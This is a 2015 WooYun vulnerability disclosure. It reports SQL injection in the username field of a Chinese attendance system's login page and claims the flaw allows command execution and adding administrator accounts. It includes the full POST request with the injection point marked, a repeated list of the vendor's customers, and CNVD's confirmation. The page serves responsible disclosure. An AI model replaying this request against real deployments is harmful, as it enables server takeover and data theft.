当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139822

漏洞标题:某考勤系统通用SQL注入漏洞(可添加服务器管理员账号)

相关厂商:cncert国家互联网应急中心

漏洞作者: 默之

提交时间:2015-09-11 10:17

修复时间:2015-10-26 18:32

公开时间:2015-10-26 18:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-11: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

因为涉及到大公司,对大公司员工的数据影响还是比较大的,所以自己评分为高

详细说明:

软件介绍:
没有找到太多的案例,只找到四个,不知道算不算

http://**.**.**.**:8181/Login.aspx?ReturnUrl=%2fmain.aspx
http://**.**.**.**:7070/
http://**.**.**.**:8090/
**.**.**.**/(中国邮政)


登陆界面统一是这样的

页面.png


在username处存在注入,并且可以获取系统权限,添加管理员账号等操作,数据包格式

POST /Login.aspx?ReturnUrl=%2fmain.aspx HTTP/1.1
Host: **.**.**.**:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: http://**.**.**.**:8181/Login.aspx?ReturnUrl=%2fmain.aspx
Content-Length: 383
Connection: keep-alive
Pragma: no-cache
ScriptManager1=UpdatePanel1%7CibtLogin&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTU4NDM0NjE3MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGlidExvZ2luZYd48hvCaEfNlaoIbkVXdk2sDsE%3D&__EVENTVALIDATION=%2FwEWBALyp5eyBQKl1bKzCQK1qbSRCwKr8tnHBmj6YlY%2B%2FraU%2Fx0vPbhAMZrcvgwn&txtUserName=admin*&txtPassword=aaaaaa&__ASYNCPOST=true&ibtLogin.x=62&ibtLogin.y=28


测试过程中,有一台机子挂掉了。。。不过还好,后面又复活了

1.png


2.png


下面是上次邮政储蓄银行和一同海瀛某某公司的(可以执行系统命令)

添加用户.png


3.png

漏洞证明:

例子有点少,我想的原因是大部分考勤系统都会被放置在内网,而不对外开放,虽然这样对黑客限制住了,但是如果有内鬼什么的也会破坏数据甚至盗用数据

1.png


2.png


下面是官网上列出来的客户目录

北京新思软件技术有限公司
山特维克材料科技(中国)有限公司
北京当代金融培训有限公司
北京时代集团
北方华锦化学工业集团有限公司
中国科学院电子学研究所
北京中科信电子装备有限公司
北京唐拉雅秀酒店(原燕京饭店)
北京中教仪
北京晓星电脑技术公司
南京德邦金属装备工程股份有限公司
优信互联(北京)信息技术有限公司
中央机构编制委员会办公室
鹤壁天汽模汽车模具有限公司
王江泾镇政府
保定长城内燃机制造有限公司
航天三院159厂
浙江恒基光伏电力科技股份有限公司
内蒙古广播电视信息网络有限公司
杭州恒龙服饰有限公司
爱康金融服务公司
常州天禄光电科技有限公司
北京得实达康系统集成有限公司
北京新思软件技术有限公司
山特维克材料科技(中国)有限公司
北京当代金融培训有限公司
北京时代集团
北方华锦化学工业集团有限公司
中国科学院电子学研究所
北京中科信电子装备有限公司
北京唐拉雅秀酒店(原燕京饭店)
北京中教仪
北京晓星电脑技术公司
南京德邦金属装备工程股份有限公司
优信互联(北京)信息技术有限公司
中央机构编制委员会办公室
鹤壁天汽模汽车模具有限公司
王江泾镇政府
保定长城内燃机制造有限公司
航天三院159厂
浙江恒基光伏电力科技股份有限公司
内蒙古广播电视信息网络有限公司
杭州恒龙服饰有限公司
爱康金融服务公司
常州天禄光电科技有限公司
北京得实达康系统集成有限公司
北京新思软件技术有限公司
山特维克材料科技(中国)有限公司
北京当代金融培训有限公司
北京时代集团
北方华锦化学工业集团有限公司
中国科学院电子学研究所
北京中科信电子装备有限公司
北京唐拉雅秀酒店(原燕京饭店)
北京中教仪
北京晓星电脑技术公司

修复方案:

升级版本

版权声明:转载请注明来源 默之@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-11 18:31

厂商回复:

CNVD确认所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无